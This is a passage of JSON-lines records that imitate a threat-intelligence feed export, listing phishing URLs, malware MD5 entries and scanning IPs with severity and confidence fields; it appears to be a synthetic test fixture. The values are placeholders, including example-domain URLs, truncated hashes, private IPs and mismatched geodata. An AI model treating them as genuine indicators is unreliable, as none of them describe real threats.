"/api/v1/intelligence/P35792781031/", "source_feed_id": 1743, "date_first": "2020-10-09T18:30:10", "date_last": "2020-10-09T18:30:10", "md5": "0f321db9"} +{"confidence": 70, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2070423140, "detail": "jn5jpvg", "id": 2435568409, "source": "Default Organization", "state": "active", "detail2": "imported by user 654", "url": "https://ax1a6o38z.example.org/enec3i/f1n8fv?4shpqq9=fbo9osx8p", "trusted_circle_ids": "633,641", "lat": -26.2, "maltype": "malware:9rb9", "value_type": "url", "source_feed_id": 3940, "date_first": "2020-10-09T18:30:13", "date_last": "2020-10-09T18:30:13", "resource_uri": "/api/v1/intelligence/P41264495308/"} +{"confidence": 35, "itype": "mal_url", "severity": "low", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "CN", "update_id": 2151391711, "detail": "7zhsn5t7,xl4", "id": 1404936664, "source": "Default Organization", "state": "active", "detail2": "imported by user 81", "url": "https://beko3.example.com/vkelnz/jdz6zf-ga?g39fu=88309ge", "trusted_circle_ids": "718,424", "lat": -55.3, "maltype": "malware:4p1lc0bf", "value_type": "url", "source_feed_id": 2236, "date_first": "2020-10-09T18:30:13", "date_last": "2020-10-09T18:30:13", "resource_uri": "/api/v1/intelligence/P22799247040/"} +{"confidence": 7, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "812", "update_id": 1852221746, "detail": "aampq5,d6-", "id": 1300368058, "source": "Default Organization", "state": "active", "detail2": "imported by user 993", "maltype": "malware:s7-t", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P43593676062/", "source_feed_id": 1581, "date_first": "2020-10-09T18:30:22", "date_last": "2020-10-09T18:30:22", "md5": "b91c"} +{"confidence": 63, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "29,879,537", "update_id": 3048270616, "detail": "", "id": 1511736215, "source": "Default Organization", "state": "active", "detail2": "imported by user 963", "maltype": "malware:0vnvp84", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P47666251160/", "source_feed_id": 1695, "date_first": "2020-10-09T18:30:23", "date_last": "2020-10-09T18:30:23", "md5": "3c49c"} +{"confidence": 95, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "192.168.2.162", "country": "US", "update_id": 2851232102, "detail": "22nciqjs", "id": 2213035853, "source": "Default Organization", "state": "active", "detail2": "imported by user 302", "url": "http://sevs82.example.com/c5-d/hdajog?4rs78hl=wvwi", "trusted_circle_ids": "766,154", "lat": -12.8, "maltype": "malware:25iv", "value_type": "url", "source_feed_id": 787, "date_first": "2020-10-09T18:30:30", "date_last": "2020-10-09T18:30:30", "resource_uri": "/api/v1/intelligence/P11608678465/"} +{"confidence": 18, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "6,539", "update_id": 2328838402, "detail": "vnx4nu7c,26sg-3-", "id": 2594216423, "source": "Default Organization", "state": "active", "detail2": "imported by user 548", "maltype": "malware:i6z9qr", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P32471582403/", "source_feed_id": 1475, "date_first": "2020-10-09T18:30:37", "date_last": "2020-10-09T18:30:37", "md5": "e29608b"} +{"confidence": 54, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "762", "update_id": 1784507596, "detail": "", "id": 1133111133, "source": "Default Organization", "state": "active", "detail2": "imported by user 438", "maltype": "malware:4rs9qpc1", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P20539380512/", "source_feed_id": 3600, "date_first": "2020-10-09T18:30:40", "date_last": "2020-10-09T18:30:40", "md5": "c38d2e6d"} +{"confidence": 78, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "751", "update_id": 2343991526, "detail": "ica,8ahl", "id": 2543010039, "source": "Default Organization", "state": "active", "detail2": "imported by user 690", "maltype": "malware:ghdl7nwwq", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P16167095005/", "source_feed_id": 926, "date_first": "2020-10-09T18:30:45", "date_last": "2020-10-09T18:30:45", "md5": "67808c"} +{"confidence": 0, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "519,390,909", "update_id": 3008175946, "detail": "iop,gyu-", "id": 3233930917, "source": "Default Organization", "state": "active", "detail2": "imported by user 517", "maltype": "malware:m5pk44o", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15758111412/", "source_feed_id": 2010, "date_first": "2020-10-09T18:30:54", "date_last": "2020-10-09T18:30:54", "md5": "efa99"} +{"confidence": 34, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "109,718,621", "update_id": 2404949482, "detail": "", "id": 1777540600, "source": "Default Organization", "state": "active", "detail2": "imported by user 303", "maltype": "malware:-fesxy", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P13990676648/", "source_feed_id": 3201, "date_first": "2020-10-09T18:30:59", "date_last": "2020-10-09T18:30:59", "md5": "e8c1"} +{"confidence": 15, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "559", "update_id": 3529199846, "detail": "", "id": 2796250594, "source": "Default Organization", "state": "active", "detail2": "imported by user 219", "maltype": "malware:c1b7kt7", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P13506696048/", "source_feed_id": 3205, "date_first": "2020-10-09T18:31:10", "date_last": "2020-10-09T18:31:10", "md5": "be24"} +{"confidence": 56, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "190,495,959", "update_id": 3510871820, "detail": "", "id": 2310429917, "source": "Default Organization", "state": "active", "detail2": "imported by user 762", "maltype": "malware:slwl", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P35629727989/", "source_feed_id": 885, "date_first": "2020-10-09T18:31:16", "date_last": "2020-10-09T18:31:16", "md5": "a2678fc"} +{"confidence": 11, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "454,562", "update_id": 3756244435, "detail": "", "id": 2853859039, "source": "Default Organization", "state": "active", "detail2": "imported by user 616", "maltype": "malware:voc", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P39948074871/", "source_feed_id": 586, "date_first": "2020-10-09T18:31:22", "date_last": "2020-10-09T18:31:22", "md5": "2ee715a9b"} +{"confidence": 51, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "846,362", "update_id": 1410682100, "detail": "gcgm1we6l,etukwxhs,g0vc9,mask=89.160.20.156,threat=bm-uj8c12", "id": 2328858169, "source": "Default Organization", "state": "active", "detail2": "imported by user 510", "maltype": "malware:yuq33pg5", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P30902643017/", "source_feed_id": 826, "date_first": "2020-10-09T18:31:27", "date_last": "2020-10-09T18:31:27", "md5": "e1df8d"} +{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "305", "update_id": 1592676961, "detail": "", "id": 1145199430, "source": "Default Organization", "state": "active", "detail2": "imported by user 14", "maltype": "malware:qc6c9qt", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P14842247088/", "source_feed_id": 1793, "date_first": "2020-10-09T18:31:29", "date_last": "2020-10-09T18:31:29", "md5": "9006d07f"} +{"confidence": 2, "itype": "phish_url", "severity": "high", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2718905308, "detail": "g1wn0g", "id": 1726466938, "source": "Default Organization", "state": "active", "detail2": "imported by user 600", "url": "http://faahk3drf.example.net/julf98x5/0g1t8f?cbffxs2qv=vwgz", "trusted_circle_ids": "553", "lat": 47.7, "maltype": "malware:t52oo3", "value_type": "url", "source_feed_id": 1965, "date_first": "2020-10-09T18:31:34", "date_last": "2020-10-09T18:31:34", "resource_uri": "/api/v1/intelligence/P39735553093/"} +{"confidence": 71, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "866", "update_id": 2310970191, "detail": "pzs4xlqy,6rblg", "id": 1457264389, "source": "Default Organization", "state": "active", "detail2": "imported by user 976", "maltype": "malware:nx1qwwprl", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P20794801988/", "source_feed_id": 1437, "date_first": "2020-10-09T18:31:36", "date_last": "2020-10-09T18:31:36", "md5": "f5d"} +{"confidence": 70, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "70,68,789", "update_id": 1487534287, "detail": "", "id": 3532094043, "source": "Default Organization", "state": "active", "detail2": "imported by user 761", "maltype": "malware:k1y", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P48760414603/", "source_feed_id": 2198, "date_first": "2020-10-09T18:31:39", "date_last": "2020-10-09T18:31:39", "md5": "cfd9"} +{"confidence": 23, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "15", "update_id": 1772862647, "detail": "6rw,g80r1d4sj", "id": 1753194968, "source": "Default Organization", "state": "active", "detail2": "imported by user 680", "maltype": "malware:ixlyb", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P36997562731/", "source_feed_id": 2101, "date_first": "2020-10-09T18:31:43", "date_last": "2020-10-09T18:31:43", "md5": "93daa"} +{"confidence": 0, "itype": "scan_ip", "severity": "high", "classification": "public", "srcip": "192.168.2.219", "country": "DE", "update_id": 2657969647, "detail": "", "id": 3285278133, "source": "Default Organization", "state": "active", "detail2": "imported by user 820", "trusted_circle_ids": "7,390", "lat": 7.3, "maltype": "malware:1u76t", "value_type": "ip", "source_feed_id": 1152, "date_first": "2020-10-09T18:31:49", "date_last": "2020-10-09T18:31:49", "resource_uri": "/api/v1/intelligence/P45121980169/"} +{"confidence": 45, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "192.168.2.208", "country": "US", "update_id": 2110937414, "detail": "om0z7", "id": 2098390184, "source": "Default Organization", "state": "active", "detail2": "imported by user 894", "url": "http://p9okf0.example.org/jyb3n8f/f55vfyt48?s2n=0t2d", "trusted_circle_ids": "846", "lat": 17.3, "maltype": "malware:hc-wh", "value_type": "url", "source_feed_id": 3354, "date_first": "2020-10-09T18:31:49", "date_last": "2020-10-09T18:31:49", "resource_uri": "/api/v1/intelligence/P33231447204/"} +{"confidence": 34, "itype": "phish_url", "severity": "low", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 2335801340, "detail": "adeba89", "id": 3367490507, "source": "Default Organization", "state": "active", "detail2": "imported by user 747", "url": "https://fxkeo24m.example.com/y75tg7sw/jnnu9xmc?apus=ob1hnba4", "trusted_circle_ids": "404,574", "lat": 42.9, "maltype": "malware:0ua9", "value_type": "url", "source_feed_id": 959, "date_first": "2020-10-09T18:31:58", "date_last": "2020-10-09T18:31:58", "resource_uri": "/api/v1/intelligence/P34959401147/"} +{"confidence": 14, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "422,852,749", "update_id": 1339527388, "detail": "", "id": 1998649659, "source": "Default Organization", "state": "active", "detail2": "imported by user 604", "maltype": "malware:s0anj", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P21831217400/", "source_feed_id": 1405, "date_first": "2020-10-09T18:32:02", "date_last": "2020-10-09T18:32:02", "md5": "b4dd5cf7"} +{"confidence": 85, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "120", "update_id": 1316735853, "detail": "nj3f,a-e8lz", "id": 3005939184, "source": "Default Organization", "state": "active", "detail2": "imported by user 386", "maltype": "malware:hn5uajghq", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P23229581043/", "source_feed_id": 652, "date_first": "2020-10-09T18:32:03", "date_last": "2020-10-09T18:32:03", "md5": "b890cdad"} +{"confidence": 31, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "98,718,828", "update_id": 3243777736, "detail": "", "id": 1900495748, "source": "Default Organization", "state": "active", "detail2": "imported by user 706", "maltype": "malware:3taf", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P35660572297/", "source_feed_id": 506, "date_first": "2020-10-09T18:32:04", "date_last": "2020-10-09T18:32:04", "md5": "817"} +{"confidence": 50, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "959,539", "update_id": 1284922297, "detail": "", "id": 1040883425, "source": "Default Organization", "state": "active", "detail2": "imported by user 222", "maltype": "malware:wsge", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P33297645928/", "source_feed_id": 146, "date_first": "2020-10-09T18:32:08", "date_last": "2020-10-09T18:32:08", "md5": "a06b"} +{"confidence": 50, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "820,394,124", "update_id": 1405107391, "detail": "", "id": 1703603090, "source": "Default Organization", "state": "active", "detail2": "imported by user 414", "maltype": "malware:yid8n1", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P25381157923/", "source_feed_id": 294, "date_first": "2020-10-09T18:32:11", "date_last": "2020-10-09T18:32:11", "md5": "ebd6108"} +{"confidence": 6, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "980,386", "update_id": 2194495180, "detail": "", "id": 1393798645, "source": "Default Organization", "state": "active", "detail2": "imported by user 872", "maltype": "malware:aeu2f0", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P34100122259/", "source_feed_id": 1256, "date_first": "2020-10-09T18:32:19", "date_last": "2020-10-09T18:32:19", "md5": "5afe0a"} +{"confidence": 46, "itype": "scan_ip", "severity": "very-high", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "CN", "update_id": 2280522298, "detail": "", "id": 3384379889, "source": "Default Organization", "state": "active", "detail2": "imported by user 237", "trusted_circle_ids": "830", "lat": 18.2, "maltype": "malware:w3rx", "value_type": "ip", "source_feed_id": 773, "date_first": "2020-10-09T18:32:30", "date_last": "2020-10-09T18:32:30", "resource_uri": "/api/v1/intelligence/P38445847685/"} +{"confidence": 60, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "437,407", "update_id": 1128332354, "detail": "", "id": 1291701932, "source": "Default Organization", "state": "active", "detail2": "imported by user 317", "maltype": "malware:upf65oc8", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P40886917073/", "source_feed_id": 2980, "date_first": "2020-10-09T18:32:35", "date_last": "2020-10-09T18:32:35", "md5": "758a81"} +{"confidence": -1, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 2267992225, "detail": "ziqdk", "id": 3279148213, "source": "Default Organization", "state": "active", "detail2": "imported by user 352", "url": "http://ke4ffyj5.example.com/t-9ikyrtt/ai91?s6u=3y1", "trusted_circle_ids": "817,831,29", "lat": 56.4, "maltype": "malware:u0e", "value_type": "url", "source_feed_id": 2315, "date_first": "2020-10-09T18:33:10", "date_last": "2020-10-09T18:33:10", "resource_uri": "/api/v1/intelligence/P37449871811/"} +{"confidence": 42, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "322,410", "update_id": 3812327380, "detail": "", "id": 2138145846, "source": "Default Organization", "state": "active", "detail2": "imported by user 768", "maltype": "malware:-shiotjs", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P24530928152/", "source_feed_id": 837, "date_first": "2020-10-09T18:33:13", "date_last": "2020-10-09T18:33:13", "md5": "c9b4"} +{"confidence": 25, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "695,520", "update_id": 2085432040, "detail": "", "id": 1502954738, "source": "Default Organization", "state": "active", "detail2": "imported by user 148", "maltype": "malware:c8f0r5d4", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P43216360516/", "source_feed_id": 3786, "date_first": "2020-10-09T18:33:14", "date_last": "2020-10-09T18:33:14", "md5": "ad0"} +{"confidence": 56, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "127", "update_id": 3768246717, "detail": "", "id": 2730182815, "source": "Default Organization", "state": "active", "detail2": "imported by user 649", "maltype": "malware:2vsd1miq", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P23842171060/", "source_feed_id": 2923, "date_first": "2020-10-09T18:33:14", "date_last": "2020-10-09T18:33:14", "md5": "571957"} +{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "public", "srcip": "192.168.2.154", "country": "US", "update_id": 3498000116, "detail": "73d", "id": 1649793681, "source": "Default Organization", "state": "active", "detail2": "imported by user 132", "url": "https://rl27d.example.net/ko6/4rtt?b12=o4mgzz2kk", "trusted_circle_ids": "715,176,824", "lat": -17.0, "maltype": "malware:d1q-sdovn", "value_type": "url", "source_feed_id": 1993, "date_first": "2020-10-09T18:33:22", "date_last": "2020-10-09T18:33:22", "resource_uri": "/api/v1/intelligence/P13727067406/"} +{"confidence": 48, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "469", "update_id": 1238197737, "detail": "e3mm2h,knjq-wt", "id": 2195098028, "source": "Default Organization", "state": "active", "detail2": "imported by user 137", "maltype": "malware:886x", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P39956518309/", "source_feed_id": 1936, "date_first": "2020-10-09T18:33:24", "date_last": "2020-10-09T18:33:24", "md5": "7f4"} +{"confidence": 62, "itype": "phish_url", "severity": "high", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 3547953290, "detail": "rb2my5u7", "id": 2273277634, "source": "Default Organization", "state": "active", "detail2": "imported by user 76", "url": "http://6ygk0y.example.com/t520/4twe?ql4bhkpop=yfpkef", "trusted_circle_ids": "22,143", "lat": 89.1, "maltype": "malware:eem8vy0", "value_type": "url", "source_feed_id": 2583, "date_first": "2020-10-09T18:33:26", "date_last": "2020-10-09T18:33:26", "resource_uri": "/api/v1/intelligence/P28216636081/"} +{"confidence": 47, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 3726618139, "detail": "3jujb6j", "id": 1593951372, "source": "Default Organization", "state": "active", "detail2": "imported by user 304", "url": "http://rcsr9o.example.net/e6f/08b?8d2y=d-42fr-", "trusted_circle_ids": "281", "lat": 49.1, "maltype": "malware:lrfqa", "value_type": "url", "source_feed_id": 1922, "date_first": "2020-10-09T18:33:27", "date_last": "2020-10-09T18:33:27", "resource_uri": "/api/v1/intelligence/P18416887501/"} +{"confidence": -1, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "873,450,588", "update_id": 2444963851, "detail": "f7ciq9,2uu9b", "id": 2881597176, "source": "Default Organization", "state": "active", "detail2": "imported by user 578", "maltype": "malware:wpo", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P37162617510/", "source_feed_id": 1312, "date_first": "2020-10-09T18:33:29", "date_last": "2020-10-09T18:33:29", "md5": "89a0a684"} +{"confidence": 51, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "551,299,501", "update_id": 3210446946, "detail": "", "id": 1789877636, "source": "Default Organization", "state": "active", "detail2": "imported by user 347", "maltype": "malware:f7l", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15884312830/", "source_feed_id": 1250, "date_first": "2020-10-09T18:33:43", "date_last": "2020-10-09T18:33:43", "md5": "a41f"} +{"confidence": 56, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "460,122,615", "update_id": 2994196701, "detail": "kpjt,f5c6pl", "id": 1300434967, "source": "Default Organization", "state": "active", "detail2": "imported by user 182", "maltype": "malware:5kjd", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P44427200974/", "source_feed_id": 1603, "date_first": "2020-10-09T18:33:45", "date_last": "2020-10-09T18:33:45", "md5": "d0f5f32"} +{"confidence": 79, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "804", "update_id": 2396481494, "detail": "", "id": 2448066635, "source": "Default Organization", "state": "active", "detail2": "imported by user 976", "maltype": "malware:7x9cgytj", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15169037907/", "source_feed_id": 814, "date_first": "2020-10-09T18:33:45", "date_last": "2020-10-09T18:33:45", "md5": "4f984375b"} +{"confidence": 15, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "192.168.2.115", "country": "US", "update_id": 1425004305, "detail": "5w8i", "id": 1693329110, "source": "Default Organization", "state": "active", "detail2": "imported by user 408", "url": "https://cc7d.example.com/kxxwobg/hd6omn?tr8=essb", "trusted_circle_ids": "374,301", "lat": -49.1, "maltype": "malware:1l5tib0", "value_type": "url", "source_feed_id": 3431, "date_first": "2020-10-09T18:33:48", "date_last": "2020-10-09T18:33:48", "resource_uri": "/api/v1/intelligence/P46598563676/"} +{"confidence": 35, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "989,396,27", "update_id": 3573181354, "detail": "", "id": 1522150430, "source": "Default Organization", "state": "active", "detail2": "imported by user 843", "maltype": "malware:8-8a", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P28645937174/", "source_feed_id": 2342, "date_first": "2020-10-09T18:33:51", "date_last": "2020-10-09T18:33:51", "md5": "9c67037e6"} +{"confidence": 71, "itype": "scan_ip", "severity": "very-high", "classification": "private", "srcip": "192.168.2.61", "country": "VN", "update_id": 1253389383, "detail": "f3ctz7j", "id": 1760436567, "source": "Default Organization", "state": "active", "detail2": "imported by user 831", "trusted_circle_ids": "342,504", "lat": -40.8, "maltype": "malware:vy02k4", "value_type": "ip", "source_feed_id": 271, "date_first": "2020-10-09T18:33:57", "date_last": "2020-10-09T18:33:57", "resource_uri": "/api/v1/intelligence/P14276852864/"} +{"confidence": 85, "itype": "scan_ip", "severity": "very-high", "classification": "public", "srcip": "192.168.2.233", "country": "DE", "update_id": 1098288836, "detail": "", "id": 1925240476, "source": "Default Organization", "state": "active", "detail2": "imported by user 650", "trusted_circle_ids": "51", "lat": -27.4, "maltype": "malware:2bnikxoma", "value_type": "ip", "source_feed_id": 1067, "date_first": "2020-10-09T18:34:00", "date_last": "2020-10-09T18:34:00", "resource_uri": "/api/v1/intelligence/P15033658538/"} +{"confidence": 91, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "US", "update_id": 2722308334, "detail": "v9ycq", "id": 3001806953, "source": "Default Organization", "state": "active", "detail2": "imported by user 489", "url": "http://v9aqrp81q.example.net/psuj4bs/rvp?qufy=ymryh", "trusted_circle_ids": "484", "lat": 39.9, "maltype": "malware:ak63t", "value_type": "url", "source_feed_id": 782, "date_first": "2020-10-09T18:34:00", "date_last": "2020-10-09T18:34:00", "resource_uri": "/api/v1/intelligence/P34696300225/"} +{"confidence": -1, "itype": "scan_ip", "severity": "very-high", "classification": "public", "srcip": "192.168.2.234", "country": "IN", "update_id": 3520784497, "detail": "", "id": 3933431319, "source": "Default Organization", "state": "active", "detail2": "imported by user 453", "trusted_circle_ids": "444", "lat": -52.2, "maltype": "malware:ejrypgr", "value_type": "ip", "source_feed_id": 1904, "date_first": "2020-10-09T18:34:00", "date_last": "2020-10-09T18:34:00", "resource_uri": "/api/v1/intelligence/P46019487828/"} +{"confidence": 95, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "743,936", "update_id": 3707298072, "detail": "xva1ki,qxwn7lw", "id": 1356788940, "source": "Default Organization", "state": "active", "detail2": "imported by user 722", "maltype": "malware:q4a", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P30118085912/", "source_feed_id": 3698, "date_first": "2020-10-09T18:34:02", "date_last": "2020-10-09T18:34:02", "md5": "a4fa"} +{"confidence": 6, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "948,642,50", "update_id": 3749914856, "detail": "r81f4,wwsw", "id": 3804309005, "source": "Default Organization", "state": "active", "detail2": "imported by user 236", "maltype": "malware:2sclqws1s", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P14689465586/", "source_feed_id": 342, "date_first": "2020-10-09T18:34:05", "date_last": "2020-10-09T18:34:05", "md5": "5e11299"} +{"confidence": 15, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "1", "update_id": 1637146862, "detail": "", "id": 1022859708, "source": "Default Organization", "state": "active", "detail2": "imported by user 488", "maltype": "malware:9cfecc", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P33092174596/", "source_feed_id": 2811, "date_first": "2020-10-09T18:34:11", "date_last": "2020-10-09T18:34:11", "md5": "22315f8"} +{"confidence": 54, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "810,910", "update_id": 1671617316, "detail": "", "id": 1581368214, "source": "Default Organization", "state": "active", "detail2": "imported by user 310", "maltype": "malware:r7vbej", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P28408487114/", "source_feed_id": 1371, "date_first": "2020-10-09T18:34:12", "date_last": "2020-10-09T18:34:12", "md5": "d4a"} +{"confidence": -1, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2477226249, "detail": "gry2doqf", "id": 3576055846, "source": "Default Organization", "state": "active", "detail2": "imported by user 376", "url": "https://o4kqv8b8.example.net/gm4d-9gt/v2iqt?x65ry67ao=skta9rp", "trusted_circle_ids": "660", "lat": 14.2, "maltype": "malware:0qqrz", "value_type": "url", "source_feed_id": 1808, "date_first": "2020-10-09T18:34:17", "date_last": "2020-10-09T18:34:17", "resource_uri": "/api/v1/intelligence/P27429039546/"} +{"confidence": 89, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "954,19,6", "update_id": 1760504719, "detail": "1l9tule2,k6p", "id": 1315247197, "source": "Default Organization", "state": "active", "detail2": "imported by user 748", "maltype": "malware:r38g5hbgx", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15092591036/", "source_feed_id": 206, "date_first": "2020-10-09T18:34:20", "date_last": "2020-10-09T18:34:20", "md5": "3eac"} +{"confidence": 25, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "392,581", "update_id": 2530088908, "detail": "d9qquxe,ulx", "id": 1562423716, "source": "Default Organization", "state": "active", "detail2": "imported by user 380", "maltype": "malware:882dlx", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P35184012550/", "source_feed_id": 3446, "date_first": "2020-10-09T18:34:20", "date_last": "2020-10-09T18:34:20", "md5": "59893613"} +{"confidence": 4, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "591,848,663", "update_id": 1937893007, "detail": "wsu7l1,zrb", "id": 1470897088, "source": "Default Organization", "state": "active", "detail2": "imported by user 423", "maltype": "malware:rwo6s", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P10368659748/", "source_feed_id": 599, "date_first": "2020-10-09T18:34:32", "date_last": "2020-10-09T18:34:32", "md5": "5facf1f"} +{"confidence": 9, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "299", "update_id": 3858315866, "detail": "", "id": 1205553827, "source": "Default Organization", "state": "active", "detail2": "imported by user 983", "maltype": "malware:-pbnrmv", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P41514908414/", "source_feed_id": 3751, "date_first": "2020-10-09T18:34:32", "date_last": "2020-10-09T18:34:32", "md5": "708b2c"} +{"confidence": -1, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "556", "update_id": 2655715062, "detail": "", "id": 1744295971, "source": "Default Organization", "state": "active", "detail2": "imported by user 314", "maltype": "malware:uqw", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P36955243007/", "source_feed_id": 2305, "date_first": "2020-10-09T18:34:39", "date_last": "2020-10-09T18:34:39", "md5": "0df"} +{"confidence": 45, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "445", "update_id": 2172945223, "detail": "ps2,qr2wno4", "id": 1782793990, "source": "Default Organization", "state": "active", "detail2": "imported by user 986", "maltype": "malware:mkctzuaaf", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P41751433270/", "source_feed_id": 3513, "date_first": "2020-10-09T18:34:40", "date_last": "2020-10-09T18:34:40", "md5": "770"} +{"confidence": 98, "itype": "scan_ip", "severity": "medium", "classification": "public", "srcip": "192.168.2.88", "country": "VN", "update_id": 1575621349, "detail": "", "id": 1130190904, "source": "Default Organization", "state": "active", "detail2": "imported by user 615", "trusted_circle_ids": "88", "lat": -79.4, "maltype": "malware:3zu2d2", "value_type": "ip", "source_feed_id": 1192, "date_first": "2020-10-09T18:34:41", "date_last": "2020-10-09T18:34:41", "resource_uri": "/api/v1/intelligence/P13755730530/"} +{"confidence": 17, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2450069481, "detail": "ao6", "id": 2499059829, "source": "Default Organization", "state": "active", "detail2": "imported by user 202", "url": "https://91p0p.example.com/easx3j6iy/xvnchuoa?dvkljl=h21", "trusted_circle_ids": "308,949", "lat": 84.6, "maltype": "malware:86-jrf6o", "value_type": "url", "source_feed_id": 852, "date_first": "2020-10-09T18:34:43", "date_last": "2020-10-09T18:34:43", "resource_uri": "/api/v1/intelligence/P43937262060/"} +{"confidence": 67, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "776", "update_id": 3951093865, "detail": "", "id": 2799251412, "source": "Default Organization", "state": "active", "detail2": "imported by user 421", "maltype": "malware:91o2", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P31632809876/", "source_feed_id": 3756, "date_first": "2020-10-09T18:34:48", "date_last": "2020-10-09T18:34:48", "md5": "f9edba87a"} +{"confidence": 22, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "35", "update_id": 3046847198, "detail": "", "id": 3711409360, "source": "Default Organization", "state": "active", "detail2": "imported by user 807", "maltype": "malware:yakt8pe9r", "value_type": "md5", 